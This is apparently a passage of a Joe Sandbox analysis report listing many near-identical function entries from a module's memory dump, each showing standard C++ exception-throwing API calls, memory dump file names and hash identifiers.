                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: aaafb358ada4c7e5e69a412913d9a0baf284b53735e4ff06be44c6c7c0f6b9ed
                                                                                                          • Instruction ID: bd8323bd59e51755094eee730872ee4f458ee99fb2cd98297a2940917f6165d0
                                                                                                          • Opcode Fuzzy Hash: aaafb358ada4c7e5e69a412913d9a0baf284b53735e4ff06be44c6c7c0f6b9ed
                                                                                                          • Instruction Fuzzy Hash: A8F0AE768042096ACB14DF98D841BCA7BF85F15344F40C1A9D8555B241EB71E604C7E5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03C420 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F03C448
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F03C45D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: a32e8897539eb3d6f951bd85155138d29170d45fa056174e18fd51c6c228fbd5
                                                                                                          • Instruction ID: d0aaea4783b8db2a5f0a69ec0ca70a3ee521c242834ec81d65de29612cb555b2
                                                                                                          • Opcode Fuzzy Hash: a32e8897539eb3d6f951bd85155138d29170d45fa056174e18fd51c6c228fbd5
                                                                                                          • Instruction Fuzzy Hash: 6EF0A776C04219BFDB14DF98D801BDA77F8AF55744F40C16AE8199B244EB31F6148BE1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03C3A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F03C3C8
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F03C3DD
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: ec777f031149a4a25f4e6021c97dc2e7d1309ea2013855bda7ae4a860ac77ff7
                                                                                                          • Instruction ID: e3b4fb38145aeda3f9f5f6ddff03eb344b23d41b87636bea5fc01d348a0b59ea
                                                                                                          • Opcode Fuzzy Hash: ec777f031149a4a25f4e6021c97dc2e7d1309ea2013855bda7ae4a860ac77ff7
                                                                                                          • Instruction Fuzzy Hash: 0BF08276C042186BDB14DFA8D941BCA77F8AF55740F50C16AE8199B284EB31A604CBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0341B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F0341D8
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F0341ED
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: b21c64c64c923ec75b6f2dd5531684609e833f9d217c7318cb70151fc9373514
                                                                                                          • Instruction ID: e54b947b1b14a35cc2c91e805773f8f2b3c42e0e0f1048a62569688fcfb3eea7
                                                                                                          • Opcode Fuzzy Hash: b21c64c64c923ec75b6f2dd5531684609e833f9d217c7318cb70151fc9373514
                                                                                                          • Instruction Fuzzy Hash: 2FF0A776C142197BDB04DF98D801BCA77F8BF55340F40C26AE9199B244EF32E6088BE1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F051F20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F051F48
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F051F5D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 82e5dd1de4ad6af7d33069be9272e2171255b7a707726c34a3cd568bdeeb88cd
                                                                                                          • Instruction ID: ed42cef2b592d543edcba87495a248f6ae68bbb5c48921197f6355720a1b0ad4
                                                                                                          • Opcode Fuzzy Hash: 82e5dd1de4ad6af7d33069be9272e2171255b7a707726c34a3cd568bdeeb88cd
                                                                                                          • Instruction Fuzzy Hash: AEF0A776904208BBDB04DF98E901BCE77F8AF55740F40C16AE8199B244EB71E6148BE1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F025FB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F025FD8
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F025FED
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: d17240ebe8a97f69af0a86ca5e3e47446a6807ad7c0960ab7139a590b37786e1
                                                                                                          • Instruction ID: 225f09aa04298e0ec7d50749d385bff08040ed0c60b016dd13a2841e4b8fd1ed
                                                                                                          • Opcode Fuzzy Hash: d17240ebe8a97f69af0a86ca5e3e47446a6807ad7c0960ab7139a590b37786e1
                                                                                                          • Instruction Fuzzy Hash: 3AF0A7769042086BDB04DF9CD801BDA77FCAF55340F40C16AE8199B685EF71EA048BE5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F025E40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F025E68
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F025E7D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: a86e1735e6b10970e8f3534c6dff31cf3a80f85fdd14827d6d0f678bdfe932b0
                                                                                                          • Instruction ID: 23800e9527c9295d3d2f0a2b83a1f9b5d960b8f375357ca28ed918aafff21ada
                                                                                                          • Opcode Fuzzy Hash: a86e1735e6b10970e8f3534c6dff31cf3a80f85fdd14827d6d0f678bdfe932b0
                                                                                                          • Instruction Fuzzy Hash: 58F0A7768002086FDB04DF9CD901BDB77FCAF55344F40C16AE8199B254EB71EA048BE5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F025EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F025F18
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F025F2D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 385bee8561741ba2f70aa98a16f39e4bd20369f0762d6c6a87524897604a1673
                                                                                                          • Instruction ID: b0e47a2b498a2b8019efdd061a665ab17d47501e93bd85e0ae549dabaec16b80
                                                                                                          • Opcode Fuzzy Hash: 385bee8561741ba2f70aa98a16f39e4bd20369f0762d6c6a87524897604a1673
                                                                                                          • Instruction Fuzzy Hash: 9FF082769142087BDB04DF98D801BDA7BF8AF55340F40C1AAE8199B244EF31E6048BE5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F025D90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F025DB8
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F025DCD
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 5db4615d0559f0caa21551b54ca9e7c4cb91475980ce67fe152115d370339df9
                                                                                                          • Instruction ID: 49a4d172028cbe8097312569966c15832bd38fba17b70c3655b1085039bdb3d1
                                                                                                          • Opcode Fuzzy Hash: 5db4615d0559f0caa21551b54ca9e7c4cb91475980ce67fe152115d370339df9
                                                                                                          • Instruction Fuzzy Hash: 1AF0A7768042086BDB14DF98D801BDA7BFCAF55340F40C16AE8199B284EF31E614CBE5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F025C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F025C58
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F025C6D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 62cc0ce79cd83ac1f634bbd4b4acbbc46d93187372fe2e674abd5121483cefb6
                                                                                                          • Instruction ID: 8483a05c0b203541228d38b45cb8fa3706103278a1b1a80d7556807f236b410d
                                                                                                          • Opcode Fuzzy Hash: 62cc0ce79cd83ac1f634bbd4b4acbbc46d93187372fe2e674abd5121483cefb6
                                                                                                          • Instruction Fuzzy Hash: 8DF082768002086FDB04DF9CD841BDA7BFCAF55340F40C16AE8199B659FB71E6048BE5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F025CE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F025D08
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F025D1D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
